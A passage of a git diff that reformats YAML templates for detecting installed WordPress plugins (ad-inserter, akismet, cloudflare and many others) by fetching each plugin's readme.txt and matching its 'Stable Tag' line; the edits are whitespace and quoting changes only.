technologies/wordpress/wordpress-tinymce-advanced.yaml | 7 +++---- .../wordpress/wordpress-translatepress-multilingual.yaml | 7 +++---- .../wordpress/wordpress-ultimate-addons-for-gutenberg.yaml | 7 +++---- .../wordpress/wordpress-under-construction-page.yaml | 7 +++---- technologies/wordpress/wordpress-unyson.yaml | 7 +++---- technologies/wordpress/wordpress-updraftplus.yaml | 7 +++---- technologies/wordpress/wordpress-use-any-font.yaml | 7 +++---- technologies/wordpress/wordpress-user-role-editor.yaml | 7 +++---- .../wordpress/wordpress-velvet-blues-update-urls.yaml | 7 +++---- technologies/wordpress/wordpress-w3-total-cache.yaml | 7 +++---- .../wordpress/wordpress-widget-importer-exporter.yaml | 7 +++---- .../wordpress/wordpress-woo-cart-abandonment-recovery.yaml | 7 +++---- .../wordpress/wordpress-woo-checkout-field-editor-pro.yaml | 7 +++---- .../wordpress/wordpress-woo-variation-swatches.yaml | 7 +++---- ...dpress-woocommerce-gateway-paypal-express-checkout.yaml | 7 +++---- .../wordpress/wordpress-woocommerce-gateway-stripe.yaml | 7 +++---- technologies/wordpress/wordpress-woocommerce-payments.yaml | 7 +++---- .../wordpress/wordpress-woocommerce-paypal-payments.yaml | 7 +++---- .../wordpress-woocommerce-pdf-invoices-packing-slips.yaml | 7 +++---- technologies/wordpress/wordpress-woocommerce-services.yaml | 7 +++---- technologies/wordpress/wordpress-woocommerce.yaml | 7 +++---- technologies/wordpress/wordpress-woosidebars.yaml | 7 +++---- technologies/wordpress/wordpress-wordfence.yaml | 7 +++---- technologies/wordpress/wordpress-wordpress-importer.yaml | 7 +++---- technologies/wordpress/wordpress-wordpress-seo.yaml | 7 +++---- technologies/wordpress/wordpress-worker.yaml | 7 +++---- technologies/wordpress/wordpress-wp-fastest-cache.yaml | 7 +++---- technologies/wordpress/wordpress-wp-file-manager.yaml | 7 +++---- technologies/wordpress/wordpress-wp-google-maps.yaml | 7 +++---- technologies/wordpress/wordpress-wp-mail-smtp.yaml | 7 +++---- technologies/wordpress/wordpress-wp-maintenance-mode.yaml | 7 +++---- technologies/wordpress/wordpress-wp-migrate-db.yaml | 7 +++---- technologies/wordpress/wordpress-wp-multibyte-patch.yaml | 7 +++---- technologies/wordpress/wordpress-wp-optimize.yaml | 7 +++---- technologies/wordpress/wordpress-wp-pagenavi.yaml | 7 +++---- technologies/wordpress/wordpress-wp-reset.yaml | 7 +++---- technologies/wordpress/wordpress-wp-sitemap-page.yaml | 7 +++---- technologies/wordpress/wordpress-wp-smushit.yaml | 7 +++---- technologies/wordpress/wordpress-wp-statistics.yaml | 7 +++---- technologies/wordpress/wordpress-wp-super-cache.yaml | 7 +++---- technologies/wordpress/wordpress-wp-user-avatar.yaml | 7 +++---- technologies/wordpress/wordpress-wpcf7-recaptcha.yaml | 7 +++---- technologies/wordpress/wordpress-wpcf7-redirect.yaml | 7 +++---- technologies/wordpress/wordpress-wpforms-lite.yaml | 7 +++---- technologies/wordpress/wordpress-wps-hide-login.yaml | 7 +++---- .../wordpress/wordpress-yith-woocommerce-compare.yaml | 7 +++---- .../wordpress/wordpress-yith-woocommerce-wishlist.yaml | 7 +++---- 199 files changed, 597 insertions(+), 796 deletions(-) diff --git a/technologies/wordpress/wordpress-ad-inserter.yaml b/technologies/wordpress/wordpress-ad-inserter.yaml index 877393e0ed..51fad43619 100644 --- a/technologies/wordpress/wordpress-ad-inserter.yaml +++ b/technologies/wordpress/wordpress-ad-inserter.yaml @@ -1,4 +1,3 @@ - id: wordpress-ad-inserter info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/ad-inserter/ metadata: plugin_namespace: ad-inserter - wpscan: https://wpscan.com/plugin/ad-inserter + wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-add-to-any.yaml b/technologies/wordpress/wordpress-add-to-any.yaml index 1042e69934..d8616be442 100644 --- a/technologies/wordpress/wordpress-add-to-any.yaml +++ b/technologies/wordpress/wordpress-add-to-any.yaml @@ -1,4 +1,3 @@ - id: wordpress-add-to-any info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/add-to-any/ metadata: plugin_namespace: add-to-any - wpscan: https://wpscan.com/plugin/add-to-any + wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-admin-menu-editor.yaml b/technologies/wordpress/wordpress-admin-menu-editor.yaml index 9914dc1390..e3559a3a3f 100644 --- a/technologies/wordpress/wordpress-admin-menu-editor.yaml +++ b/technologies/wordpress/wordpress-admin-menu-editor.yaml @@ -1,4 +1,3 @@ - id: wordpress-admin-menu-editor info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/admin-menu-editor/ metadata: plugin_namespace: admin-menu-editor - wpscan: https://wpscan.com/plugin/admin-menu-editor + wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-adminimize.yaml b/technologies/wordpress/wordpress-adminimize.yaml index 3c101dd403..7baed3fe7e 100644 --- a/technologies/wordpress/wordpress-adminimize.yaml +++ b/technologies/wordpress/wordpress-adminimize.yaml @@ -1,4 +1,3 @@ - id: wordpress-adminimize info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/adminimize/ metadata: plugin_namespace: adminimize - wpscan: https://wpscan.com/plugin/adminimize + wpscan: https://wpscan.com/plugin/adminimize tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/adminimize/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-advanced-custom-fields.yaml b/technologies/wordpress/wordpress-advanced-custom-fields.yaml index 51252eae9d..d65c4f7b7c 100644 --- a/technologies/wordpress/wordpress-advanced-custom-fields.yaml +++ b/technologies/wordpress/wordpress-advanced-custom-fields.yaml @@ -1,4 +1,3 @@ - id: wordpress-advanced-custom-fields info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: plugin_namespace: advanced-custom-fields - wpscan: https://wpscan.com/plugin/advanced-custom-fields + wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-akismet.yaml b/technologies/wordpress/wordpress-akismet.yaml index e6005864c7..c8b2f2b1d0 100644 --- a/technologies/wordpress/wordpress-akismet.yaml +++ b/technologies/wordpress/wordpress-akismet.yaml @@ -1,4 +1,3 @@ - id: wordpress-akismet info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/akismet/ metadata: plugin_namespace: akismet - wpscan: https://wpscan.com/plugin/akismet + wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/akismet/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml b/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml index 864216c1e4..4e71b5ad00 100644 --- a/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml +++ b/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml @@ -1,4 +1,3 @@ - id: wordpress-all-404-redirect-to-homepage info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: plugin_namespace: all-404-redirect-to-homepage - wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage + wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml b/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml index 2c9255bead..52c55e3915 100644 --- a/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml +++ b/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml @@ -1,4 +1,3 @@ - id: wordpress-all-in-one-seo-pack info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: plugin_namespace: all-in-one-seo-pack - wpscan: https://wpscan.com/plugin/all-in-one-seo-pack + wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml b/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml index 14dcca2448..522a72e3bf 100644 --- a/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml +++ b/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml @@ -1,4 +1,3 @@ - id: wordpress-all-in-one-wp-migration info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: plugin_namespace: all-in-one-wp-migration - wpscan: https://wpscan.com/plugin/all-in-one-wp-migration + wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml b/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml index e531e40ec3..e9b260e00e 100644 --- a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml +++ b/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml @@ -1,4 +1,3 @@ - id: wordpress-all-in-one-wp-security-and-firewall info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: plugin_namespace: all-in-one-wp-security-and-firewall - wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall + wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-amp.yaml b/technologies/wordpress/wordpress-amp.yaml index 54691efa17..f818739085 100644 --- a/technologies/wordpress/wordpress-amp.yaml +++ b/technologies/wordpress/wordpress-amp.yaml @@ -1,4 +1,3 @@ - id: wordpress-amp info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/amp/ metadata: plugin_namespace: amp - wpscan: https://wpscan.com/plugin/amp + wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/amp/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-antispam-bee.yaml b/technologies/wordpress/wordpress-antispam-bee.yaml index ac8fe4b24b..6ce8f43a61 100644 --- a/technologies/wordpress/wordpress-antispam-bee.yaml +++ b/technologies/wordpress/wordpress-antispam-bee.yaml @@ -1,4 +1,3 @@ - id: wordpress-antispam-bee info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/antispam-bee/ metadata: plugin_namespace: antispam-bee - wpscan: https://wpscan.com/plugin/antispam-bee + wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-astra-sites.yaml b/technologies/wordpress/wordpress-astra-sites.yaml index 5ae51394f5..2573bc5c90 100644 --- a/technologies/wordpress/wordpress-astra-sites.yaml +++ b/technologies/wordpress/wordpress-astra-sites.yaml @@ -1,4 +1,3 @@ - id: wordpress-astra-sites info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/astra-sites/ metadata: plugin_namespace: astra-sites - wpscan: https://wpscan.com/plugin/astra-sites + wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-astra-widgets.yaml b/technologies/wordpress/wordpress-astra-widgets.yaml index 29488dcd22..d075689079 100644 --- a/technologies/wordpress/wordpress-astra-widgets.yaml +++ b/technologies/wordpress/wordpress-astra-widgets.yaml @@ -1,4 +1,3 @@ - id: wordpress-astra-widgets info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/astra-widgets/ metadata: plugin_namespace: astra-widgets - wpscan: https://wpscan.com/plugin/astra-widgets + wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-autoptimize.yaml b/technologies/wordpress/wordpress-autoptimize.yaml index 6ff6aacff9..cc7c99eccd 100644 --- a/technologies/wordpress/wordpress-autoptimize.yaml +++ b/technologies/wordpress/wordpress-autoptimize.yaml @@ -1,4 +1,3 @@ - id: wordpress-autoptimize info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/autoptimize/ metadata: plugin_namespace: autoptimize - wpscan: https://wpscan.com/plugin/autoptimize + wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-backwpup.yaml b/technologies/wordpress/wordpress-backwpup.yaml index 23577ab564..ee28fb0db0 100644 --- a/technologies/wordpress/wordpress-backwpup.yaml +++ b/technologies/wordpress/wordpress-backwpup.yaml @@ -1,4 +1,3 @@ - id: wordpress-backwpup info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/backwpup/ metadata: plugin_namespace: backwpup - wpscan: https://wpscan.com/plugin/backwpup + wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-better-search-replace.yaml b/technologies/wordpress/wordpress-better-search-replace.yaml index ed77f66422..4df9d8d7f6 100644 --- a/technologies/wordpress/wordpress-better-search-replace.yaml +++ b/technologies/wordpress/wordpress-better-search-replace.yaml @@ -1,4 +1,3 @@ - id: wordpress-better-search-replace info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/better-search-replace/ metadata: plugin_namespace: better-search-replace - wpscan: https://wpscan.com/plugin/better-search-replace + wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-better-wp-security.yaml b/technologies/wordpress/wordpress-better-wp-security.yaml index f69474cd60..56c071fb76 100644 --- a/technologies/wordpress/wordpress-better-wp-security.yaml +++ b/technologies/wordpress/wordpress-better-wp-security.yaml @@ -1,4 +1,3 @@ - id: wordpress-better-wp-security info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/better-wp-security/ metadata: plugin_namespace: better-wp-security - wpscan: https://wpscan.com/plugin/better-wp-security + wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml b/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml index afaac29a6a..2f7b3092c7 100644 --- a/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml +++ b/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml @@ -1,4 +1,3 @@ - id: wordpress-black-studio-tinymce-widget info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: plugin_namespace: black-studio-tinymce-widget - wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget + wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-breadcrumb-navxt.yaml b/technologies/wordpress/wordpress-breadcrumb-navxt.yaml index d62227eff2..ce82706605 100644 --- a/technologies/wordpress/wordpress-breadcrumb-navxt.yaml +++ b/technologies/wordpress/wordpress-breadcrumb-navxt.yaml @@ -1,4 +1,3 @@ - id: wordpress-breadcrumb-navxt info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: plugin_namespace: breadcrumb-navxt - wpscan: https://wpscan.com/plugin/breadcrumb-navxt + wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-broken-link-checker.yaml b/technologies/wordpress/wordpress-broken-link-checker.yaml index 7aa89ccb8d..b988aa7b55 100644 --- a/technologies/wordpress/wordpress-broken-link-checker.yaml +++ b/technologies/wordpress/wordpress-broken-link-checker.yaml @@ -1,4 +1,3 @@ - id: wordpress-broken-link-checker info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/broken-link-checker/ metadata: plugin_namespace: broken-link-checker - wpscan: https://wpscan.com/plugin/broken-link-checker + wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-child-theme-configurator.yaml b/technologies/wordpress/wordpress-child-theme-configurator.yaml index 0fdd5f8e24..b764640866 100644 --- a/technologies/wordpress/wordpress-child-theme-configurator.yaml +++ b/technologies/wordpress/wordpress-child-theme-configurator.yaml @@ -1,4 +1,3 @@ - id: wordpress-child-theme-configurator info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/child-theme-configurator/ metadata: plugin_namespace: child-theme-configurator - wpscan: https://wpscan.com/plugin/child-theme-configurator + wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-classic-editor.yaml b/technologies/wordpress/wordpress-classic-editor.yaml index c336cfd406..686c11dfc7 100644 --- a/technologies/wordpress/wordpress-classic-editor.yaml +++ b/technologies/wordpress/wordpress-classic-editor.yaml @@ -1,4 +1,3 @@ - id: wordpress-classic-editor info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/classic-editor/ metadata: plugin_namespace: classic-editor - wpscan: https://wpscan.com/plugin/classic-editor + wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-classic-widgets.yaml b/technologies/wordpress/wordpress-classic-widgets.yaml index 49cb1f965b..8ca637ce6d 100644 --- a/technologies/wordpress/wordpress-classic-widgets.yaml +++ b/technologies/wordpress/wordpress-classic-widgets.yaml @@ -1,4 +1,3 @@ - id: wordpress-classic-widgets info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/classic-widgets/ metadata: plugin_namespace: classic-widgets - wpscan: https://wpscan.com/plugin/classic-widgets + wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml b/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml index 42ba23f4a3..030aa4fb01 100644 --- a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml +++ b/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml @@ -1,4 +1,3 @@ - id: wordpress-click-to-chat-for-whatsapp info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: plugin_namespace: click-to-chat-for-whatsapp - wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp + wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-cloudflare.yaml b/technologies/wordpress/wordpress-cloudflare.yaml index 9c3a49f45f..1a3b327d5f 100644 --- a/technologies/wordpress/wordpress-cloudflare.yaml +++ b/technologies/wordpress/wordpress-cloudflare.yaml @@ -1,4 +1,3 @@ - id: wordpress-cloudflare info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/cloudflare/ metadata: plugin_namespace: cloudflare - wpscan: https://wpscan.com/plugin/cloudflare + wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/cloudflare/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-cmb2.yaml b/technologies/wordpress/wordpress-cmb2.yaml index 496903cdfe..62fca27118 100644 --- a/technologies/wordpress/wordpress-cmb2.yaml +++ b/technologies/wordpress/wordpress-cmb2.yaml @@ -1,4 +1,3 @@ - id: wordpress-cmb2 info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/cmb2/ metadata: plugin_namespace: cmb2 - wpscan: https://wpscan.com/plugin/cmb2 + wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-coblocks.yaml b/technologies/wordpress/wordpress-coblocks.yaml index 1ec83936b0..2df3683134 100644 --- a/technologies/wordpress/wordpress-coblocks.yaml +++ b/technologies/wordpress/wordpress-coblocks.yaml @@ -1,4 +1,3 @@ - id: wordpress-coblocks info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/coblocks/ metadata: plugin_namespace: coblocks - wpscan: https://wpscan.com/plugin/coblocks + wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-code-snippets.yaml b/technologies/wordpress/wordpress-code-snippets.yaml index 689ae14ae1..0e915dc410 100644 --- a/technologies/wordpress/wordpress-code-snippets.yaml +++ b/technologies/wordpress/wordpress-code-snippets.yaml @@ -1,4 +1,3 @@ - id: wordpress-code-snippets info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/code-snippets/ metadata: plugin_namespace: code-snippets - wpscan: https://wpscan.com/plugin/code-snippets + wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-coming-soon.yaml b/technologies/wordpress/wordpress-coming-soon.yaml index b3ee0df382..2fe22a7e8a 100644 --- a/technologies/wordpress/wordpress-coming-soon.yaml +++ b/technologies/wordpress/wordpress-coming-soon.yaml @@ -1,4 +1,3 @@ - id: wordpress-coming-soon info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/coming-soon/ metadata: plugin_namespace: coming-soon - wpscan: https://wpscan.com/plugin/coming-soon + wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-complianz-gdpr.yaml b/technologies/wordpress/wordpress-complianz-gdpr.yaml index e1c54c59f5..6d1a7046a6 100644 --- a/technologies/wordpress/wordpress-complianz-gdpr.yaml +++ b/technologies/wordpress/wordpress-complianz-gdpr.yaml @@ -1,4 +1,3 @@ - id: wordpress-complianz-gdpr info: @@ -9,7 +8,7 @@ info: - 